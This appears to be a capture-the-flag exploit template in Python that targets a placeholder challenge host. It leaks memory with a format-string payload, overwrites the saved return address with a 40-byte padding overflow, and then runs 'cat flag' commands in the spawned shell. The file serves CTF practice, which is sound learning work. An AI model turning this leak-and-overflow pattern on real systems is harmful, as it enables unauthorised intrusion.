Files
ctfkit/templates/pwn_skeleton.py
T

56 lines
1.4 KiB
Python

"""
PWN skeleton — copy & fill. (p4-team style)
Workflow:
1. Leak (format string / GOT / libc) -> step 1
2. Build ROP / overwrite -> step 2
3. Get shell / read flag -> step 3
"""
from lib.net import nc, receive_until, receive_until_match, send, sendline # noqa
from pwn import * # noqa (ELF, ROP, p64, u64, context)
context.log_level = 'info'
context.arch = 'amd64' # or 'i386'
HOST, PORT = "challenge.host", 1337
# binary = ELF('./challenge')
# libc = ELF('./libc.so.6')
def step1_leak(s):
"""Leak libc/stack/PIE base. Adapt to the vuln (format string shown here)."""
s.recv_until(b"name > ")
# classic format-string leak
sendline(s, b"%9$p|%11$p")
line = s.recv_until(b"\n")
leak = int(line.split(b"|")[0], 16)
log.info("leak = %#x", leak)
return leak
def step2_exploit(s, leak):
"""Construct payload. Fill with your gadgets/ROP."""
payload = b"A" * 40 # padding to saved RIP
payload += p64(leak) # example: overwrite with leaked addr
# payload += rop.chain(...)
s.recv_until(b"message > ")
sendline(s, payload)
def step3(s):
s.recv_until(b"$ ") # shell prompt, or just:
sendline(s, b"cat flag*; cat /flag*")
print(s.recvall(timeout=3).decode(errors='replace'))
def main():
s = nc(HOST, PORT)
leak = step1_leak(s)
step2_exploit(s, leak)
step3(s)
s.close()
if __name__ == "__main__":
main()